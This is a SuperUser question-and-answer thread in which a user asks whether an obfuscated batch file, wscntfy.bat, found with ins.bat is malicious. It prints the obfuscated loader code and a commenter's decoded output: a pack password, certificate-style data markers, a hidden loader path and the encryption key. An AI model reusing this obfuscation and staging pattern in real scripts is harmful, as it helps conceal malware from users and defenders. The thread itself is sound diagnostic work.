# What this script is doing ? Is it malicious?

Tags: batch, batch-file

I have the following script named **ins.bat**, can someone please explain what it actually do. It is in a directory named "Files" on my desktop.

```
for /f "tokens=*" %%i in ("%~1") do pushd "%%~dpi"

set akonhlqu=PjQVyJhXmirnezoOpBGFYkDtaIZbsvCLcUlHSwWMgAEdKNxTRufq

call wscntfy.bat
```

wscntfy.bat file content

```
RemoteLoaderScriptName01%akonhlqu:~36,1%%akonhlqu:~42,1%%akonhlqu:~47,1%%akonhlqu:~31,1%%akonhlqu:~15,1%%akonhlqu:~30,1%%akonhlqu:~41,1%%akonhlqu:~31,1% %akonhlqu:~42,1%%akonhlqu:~45,1%%akonhlqu:~41,1%%akonhlqu:~17,1%%akonhlqu:~31,1%%akonhlqu:~42,1%%akonhlqu:~42,1%%akonhlqu:~7,1%%akonhlqu:~47,1%%akonhlqu:~42,1%%akonhlqu:~45,1%%akonhlqu:~36,1%%akonhlqu:~25,1%%akonhlqu:~15,1%%akonhlqu:~45,1%%akonhlqu:~36,1% %akonhlqu:~42,1%%akonhlqu:~45,1%%akonhlqu:~41,1%%akonhlqu:~17,1%%akonhlqu:~31,1%%akonhlqu:~42,1%%akonhlqu:~22,1%%akonhlqu:~42,1%%akonhlqu:~31,1%%akonhlqu:~41,1%%akonhlqu:~20,1%%akonhlqu:~42,1%%akonhlqu:~22,1%%akonhlqu:~42,1%%akonhlqu:~7,1%%akonhlqu:~0,1%%akonhlqu:~41,1%%akonhlqu:~45,1%%akonhlqu:~36,1%%akonhlqu:~25,1%%akonhlqu:~15,1%%akonhlqu:~45,1%
    %akonhlqu:~28,1%%akonhlqu:~12,1%%akonhlqu:~23,1% "%akonhlqu:~47,1%%akonhlqu:~24,1%%akonhlqu:~10,1%%akonhlqu:~40,1%%akonhlqu:~12,1%%akonhlqu:~23,1%%akonhlqu:~36,1%%akonhlqu:~4,1%%akonhlqu:~28,1%%akonhlqu:~23,1%%akonhlqu:~12,1%%akonhlqu:~8,1%%akonhlqu:~41,1%%akonhlqu:~10,1%%akonhlqu:~32,1%%akonhlqu:~6,1%%akonhlqu:~9,1%%akonhlqu:~23,1%%akonhlqu:~12,1%%akonhlqu:~32,1%%akonhlqu:~23,1%%akonhlqu:~49,1%%akonhlqu:~10,1%%akonhlqu:~12,1%=%akonhlqu:~46,1%64"
    %akonhlqu:~28,1%%akonhlqu:~12,1%%akonhlqu:~23,1% "%akonhlqu:~25,1%%akonhlqu:~11,1%%akonhlqu:~28,1%%akonhlqu:~23,1%%akonhlqu:~24,1%%akonhlqu:~34,1%%akonhlqu:~34,1%%akonhlqu:~12,1%%akonhlqu:~10,1%%akonhlqu:~42,1%%akonhlqu:~46,1%%akonhlqu:~23,1%%akonhlqu:~10,1%%akonhlqu:~24,1%%akonhlqu:~32,1%%akonhlqu:~23,1%%akonhlqu:~0,1%%akonhlqu:~24,1%%akonhlqu:~23,1%%akonhlqu:~6,1%=%PUBLIC%"
    %akonhlqu:~28,1%%akonhlqu:~12,1%%akonhlqu:~23,1% "%akonhlqu:~0,1%%akonhlqu:~24,1%%akonhlqu:~32,1%%akonhlqu:~21,1%%akonhlqu:~0,1%%akonhlqu:~24,1%%akonhlqu:~28,1%%akonhlqu:~28,1%%akonhlqu:~37,1%%akonhlqu:~14,1%%akonhlqu:~10,1%%akonhlqu:~43,1%=%akonhlqu:~19,1%46%akonhlqu:~30,1%-069%akonhlqu:~41,1%-51%akonhlqu:~19,1%%akonhlqu:~42,1%-%akonhlqu:~19,1%694"
    %akonhlqu:~28,1%%akonhlqu:~12,1%%akonhlqu:~23,1% "%akonhlqu:~0,1%%akonhlqu:~24,1%%akonhlqu:~32,1%%akonhlqu:~21,1%%akonhlqu:~22,1%%akonhlqu:~24,1%%akonhlqu:~23,1%%akonhlqu:~24,1%%akonhlqu:~31,1%%akonhlqu:~9,1%%akonhlqu:~11,1%%akonhlqu:~12,1%%akonhlqu:~17,1%%akonhlqu:~12,1%%akonhlqu:~40,1%%akonhlqu:~9,1%%akonhlqu:~11,1%=-----%akonhlqu:~17,1%%akonhlqu:~42,1%%akonhlqu:~18,1%%akonhlqu:~25,1%%akonhlqu:~45,1% %akonhlqu:~30,1%%akonhlqu:~42,1%%akonhlqu:~48,1%%akonhlqu:~47,1%%akonhlqu:~25,1%%akonhlqu:~19,1%%akonhlqu:~25,1%%akonhlqu:~30,1%%akonhlqu:~41,1%%akonhlqu:~47,1%%akonhlqu:~42,1%-----"
    %akonhlqu:~28,1%%akonhlqu:~12,1%%akonhlqu:~23,1% "%akonhlqu:~0,1%%akonhlqu:~24,1%%akonhlqu:~32,1%%akonhlqu:~21,1%%akonhlqu:~22,1%%akonhlqu:~24,1%%akonhlqu:~23,1%%akonhlqu:~24,1%%akonhlqu:~31,1%%akonhlqu:~9,1%%akonhlqu:~11,1%%akonhlqu:~12,1%%akonhlqu:~42,1%%akonhlqu:~11,1%%akonhlqu:~43,1%=-----%akonhlqu:~42,1%%akonhlqu:~45,1%%akonhlqu:~22,1% %akonhlqu:~30,1%%akonhlqu:~42,1%%akonhlqu:~48,1%%akonhlqu:~47,1%%akonhlqu:~25,1%%akonhlqu:~19,1%%akonhlqu:~25,1%%akonhlqu:~30,1%%akonhlqu:~41,1%%akonhlqu:~47,1%%akonhlqu:~42,1%-----"
    %akonhlqu:~28,1%%akonhlqu:~12,1%%akonhlqu:~23,1% "%akonhlqu:~48,1%%akonhlqu:~12,1%%akonhlqu:~8,1%%akonhlqu:~14,1%%akonhlqu:~23,1%%akonhlqu:~12,1%%akonhlqu:~31,1%%akonhlqu:~14,1%%akonhlqu:~24,1%%akonhlqu:~43,1%%akonhlqu:~12,1%%akonhlqu:~10,1%%akonhlqu:~0,1%%akonhlqu:~24,1%%akonhlqu:~23,1%%akonhlqu:~6,1%=%PUBLIC%\%akonhlqu:~31,1%%akonhlqu:~9,1%%akonhlqu:~27,1%%akonhlqu:~10,1%%akonhlqu:~24,1%%akonhlqu:~10,1%%akonhlqu:~9,1%%akonhlqu:~12,1%%akonhlqu:~28,1%\%akonhlqu:~41,1%%akonhlqu:~16,1%%akonhlqu:~16,1%%akonhlqu:~22,1%%akonhlqu:~24,1%%akonhlqu:~23,1%%akonhlqu:~24,1%\%akonhlqu:~30,1%%akonhlqu:~14,1%%akonhlqu:~8,1%%akonhlqu:~8,1%%akonhlqu:~28,1%\%akonhlqu:~36,1%%akonhlqu:~23,1%%akonhlqu:~14,1%%akonhlqu:~10,1%%akonhlqu:~24,1%%akonhlqu:~40,1%%akonhlqu:~12,1% %akonhlqu:~47,1%%akonhlqu:~9,1%%akonhlqu:~12,1%%akonhlqu:~10,1%%akonhlqu:~28,1%"
    %akonhlqu:~28,1%%akonhlqu:~12,1%%akonhlqu:~23,1% "%akonhlqu:~48,1%%akonhlqu:~12,1%%akonhlqu:~8,1%%akonhlqu:~14,1%%akonhlqu:~23,1%%akonhlqu:~12,1%%akonhlqu:~31,1%%akonhlqu:~14,1%%akonhlqu:~24,1%%akonhlqu:~43,1%%akonhlqu:~12,1%%akonhlqu:~10,1%%akonhlqu:~36,1%%akonhlqu:~32,1%%akonhlqu:~10,1%%akonhlqu:~9,1%%akonhlqu:~16,1%%akonhlqu:~23,1%%akonhlqu:~45,1%%akonhlqu:~24,1%%akonhlqu:~8,1%%akonhlqu:~12,1%01=%akonhlqu:~28,1%%akonhlqu:~23,1%%akonhlqu:~14,1%%akonhlqu:~10,1%%akonhlqu:~12,1%-%akonhlqu:~43,1%%akonhlqu:~24,1%%akonhlqu:~23,1%%akonhlqu:~24,1%-%akonhlqu:~49,1%%akonhlqu:~16,1%%akonhlqu:~43,1%%akonhlqu:~24,1%%akonhlqu:~23,1%%akonhlqu:~12,1%.%akonhlqu:~27,1%%akonhlqu:~24,1%%akonhlqu:~23,1%"
    %akonhlqu:~28,1%%akonhlqu:~12,1%%akonhlqu:~23,1% "%akonhlqu:~17,1%%akonhlqu:~24,1%%akonhlqu:~23,1%%akonhlqu:~30,1%%akonhlqu:~10,1%%akonhlqu:~4,1%%akonhlqu:~16,1%%akonhlqu:~23,1%%akonhlqu:~44,1%%akonhlqu:~12,1%%akonhlqu:~4,1%%akonhlqu:~45,1%%akonhlqu:~24,1%%akonhlqu:~8,1%%akonhlqu:~12,1%=%akonhlqu:~24,1%%akonhlqu:~21,1%%akonhlqu:~14,1%%akonhlqu:~11,1%%akonhlqu:~6,1%%akonhlqu:~34,1%%akonhlqu:~51,1%%akonhlqu:~49,1%"
    %akonhlqu:~28,1%%akonhlqu:~12,1%%akonhlqu:~23,1% "%akonhlqu:~17,1%%akonhlqu:~24,1%%akonhlqu:~23,1%%akonhlqu:~30,1%%akonhlqu:~10,1%%akonhlqu:~4,1%%akonhlqu:~16,1%%akonhlqu:~23,1%%akonhlqu:~44,1%%akonhlqu:~12,1%%akonhlqu:~4,1%%akonhlqu:~3,1%%akonhlqu:~24,1%%akonhlqu:~34,1%=%akonhlqu:~0,1%%akonhlqu:~1,1%%akonhlqu:~2,1%%akonhlqu:~3,1%%akonhlqu:~4,1%%akonhlqu:~5,1%%akonhlqu:~6,1%%akonhlqu:~7,1%%akonhlqu:~8,1%%akonhlqu:~9,1%%akonhlqu:~10,1%%akonhlqu:~11,1%%akonhlqu:~12,1%%akonhlqu:~13,1%%akonhlqu:~14,1%%akonhlqu:~15,1%%akonhlqu:~16,1%%akonhlqu:~17,1%%akonhlqu:~18,1%%akonhlqu:~19,1%%akonhlqu:~20,1%%akonhlqu:~21,1%%akonhlqu:~22,1%%akonhlqu:~23,1%%akonhlqu:~24,1%%akonhlqu:~25,1%%akonhlqu:~26,1%%akonhlqu:~27,1%%akonhlqu:~28,1%%akonhlqu:~29,1%%akonhlqu:~30,1%%akonhlqu:~31,1%%akonhlqu:~32,1%%akonhlqu:~33,1%%akonhlqu:~34,1%%akonhlqu:~35,1%%akonhlqu:~36,1%%akonhlqu:~37,1%%akonhlqu:~38,1%%akonhlqu:~39,1%%akonhlqu:~40,1%%akonhlqu:~41,1%%akonhlqu:~42,1%%akonhlqu:~43,1%%akonhlqu:~44,1%%akonhlqu:~45,1%%akonhlqu:~46,1%%akonhlqu:~47,1%%akonhlqu:~48,1%%akonhlqu:~49,1%%akonhlqu:~50,1%%akonhlqu:~51,1%
    "
```

Comment: Hi, and welcome to SuperUser. It is impossible for us to tell you if this is malicious. We can tell you what the script does, but without knowing how or when it is used, it can't be determined.  For example, the script refers to a parameter, and that parameter is a file with path. It will set the current path to that folder. It sets an ambigious variable and it calls an external script. More than this information I cannot give you, as this is all there is.

Comment: @Arjan I have added the some more details to the question.

Comment: _Assuming_ that things like `%akonhlqu:~36,1%` take the substring from the list of characters in `akonhlqu`, starting at index 36 (probably zero-based?), 1 character long, it seems to me that if you prefix all lines with `echo` and a space, you'd see what the command is that _would_ be run? (Like: copy that `wscntfy.bat` to some new file, prefix each line with `echo` and a space, and add the line `set akonhlqu=PjQVyJhXmirnezoOpBGFYkDtaIZbsvCLcUlHSwWMgAEdKNxTRufq` as the first line, verify your steps, and see what you get...?) **It's malicious for sure, so where did you get it from...?**

Comment: @Arjan I tried this. I got lines like `RemoteLoaderScriptName01SETLOCAL ENABLEEXTENSIONS ENABLEDELAYEDEXPANSION` `set "TargetSystemArchitecture=x64"` `set "InstallerExtractPath="` `set "PackPassword=F46C-069A-51FE-F694"` `set "PackDataLineBegin=-----BEGIN CERTIFICATE-----"` `set "PackDataLineEnd=-----END CERTIFICATE-----"` `set "RemoteLoaderPath=\Libraries\AppData\Comms\Storage Tiers"` `set "RemoteLoaderScriptName01=store-data-update.bat"` `set "BatCryptKeyName=akonhlqu"` `set "BatCryptKeyVal=PjQVyJhXmirnezoOpBGFYkDtaIZbsvCLcUlHSwWMgAEdKNxTRufq`

Comment: Nice, @Kamil. And @Kamran, the name `BatCryptKeyName` might suggest some cryptoware/ ransomware...? Time to back up your files if you didn't already!

Answer (score 1):

> Can someone please explain what it actually does?

At a casual glance, it apparently:

- Changes the current directory to one passed at the command line and puts the previous directory on a virtual stack (see [%1](https://www.computerhope.com/jargon/num/percent1.htm), as well as [pushd](https://ss64.com/nt/pushd.html) and [%~dpi](https://stackoverflow.com/q/5034076/3395469)).
- Sets an encoded variable of some kind.
- Runs a batch file, possibly related to `wscntfy.exe`, which was an executable introduced in Windows XP Service Pack 2 for the Windows Security Center. It displayed a tray icon indicating the status of updates, virus protection and the firewall. As far as I am aware, `wscntfy.exe` doesn't exist on Windows Vista or later.

> What is this script doing? Is it malicious?

Unfortunately, without additional information, it's unlikely anyone could reliably make that determination.

Comment: Thanks for your reply. I have added contents for wscntfy.bat file , is it an encrypted program or something of that sort ?

Comment: It looks like it is running a script of some kind, possibly with a random/encoded name as well.

Comment: The fact that it tries to hide its intentions, it is probably malicious.